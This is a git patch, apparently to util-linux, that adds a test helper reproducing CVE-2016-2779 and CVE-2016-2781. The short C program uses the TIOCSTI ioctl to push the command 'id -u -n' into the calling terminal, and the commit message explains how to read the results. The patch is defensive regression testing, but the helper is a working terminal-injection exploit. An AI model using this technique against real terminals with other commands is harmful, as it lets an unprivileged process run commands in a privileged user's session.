From a0a8e9884443601abf9f06b715f2f6bb0820cbad Mon Sep 17 00:00:00 2001
From: Stanislav Brabec
Date: Wed, 2 Mar 2016 20:35:54 +0100
Subject: tests: Add helper for TIOCSTI exploit

This helper/exploit injects "id -u -n\n" to the vulnerable calling terminal.

Use id -u -n to get a reproducible output of test cases based on it.

What can happen:

Nothing, no exploit: pty is not accessible, sedsid() disconnected the task from
pty, TIOCSTI failed.

The command is injected to the unprivileged environment pty, and you see e. g.
"nobody": This is acceptable.

The command is injected to the caller (privileged) pty, and you see "root" (or
caller uid name): This is not acceptable and has security implications.

References:

CVE-2016-2779
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2779
http://seclists.org/oss-sec/2016/q1/448
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=815922
https://bugzilla.redhat.com/show_bug.cgi?id=173008
https://bugzilla.suse.com/show_bug.cgi?id=968674
https://bugzilla.suse.com/show_bug.cgi?id=968675

CVE-2016-2781
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2781
http://seclists.org/oss-sec/2016/q1/452

Signed-off-by: Stanislav Brabec <sbrabec@suse.cz>
Cc: Federico Bento <up201407890@alunos.dcc.fc.up.pt>
---
 tests/helpers/Makemodule.am  |  3 +++
 tests/helpers/test_tiocsti.c | 27 +++++++++++++++++++++++++++
 2 files changed, 30 insertions(+)
 create mode 100644 tests/helpers/test_tiocsti.c

(limited to 'tests/helpers')

diff --git a/tests/helpers/Makemodule.am b/tests/helpers/Makemodule.am
index 0618e7578..3070a8bbc 100644
--- a/tests/helpers/Makemodule.am
+++ b/tests/helpers/Makemodule.am
@@ -15,3 +15,6 @@ check_PROGRAMS += test_sigreceive
 test_sigreceive_SOURCES = tests/helpers/test_sigreceive.c
 test_sigreceive_LDADD = $(LDADD) libcommon.la
 
+check_PROGRAMS += test_tiocsti
+test_tiocsti_SOURCES = tests/helpers/test_tiocsti.c
+
diff --git a/tests/helpers/test_tiocsti.c b/tests/helpers/test_tiocsti.c
new file mode 100644
index 000000000..c269dc037
--- /dev/null
+++ b/tests/helpers/test_tiocsti.c
@@ -0,0 +1,27 @@
+/*
+ * test_tiocsti - test security of TIOCSTI
+ *
+ * Written by Federico Bento <up201407890@alunos.dcc.fc.up.pt>
+ *
+ * This program is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU General Public License as
+ * published by the Free Software Foundation.
+ *
+ * This program is distributed in the hope that it would be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program; if not, write to the Free Software Foundation, Inc.,
+ * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+ */
+
+#include <sys/ioctl.h>
+
+int main(void)
+{
+  char *cmd = "id -u -n\n";
+  while(*cmd)
+   ioctl(0, TIOCSTI, cmd++);
+}
-- 
cgit v1.2.3-55-g7522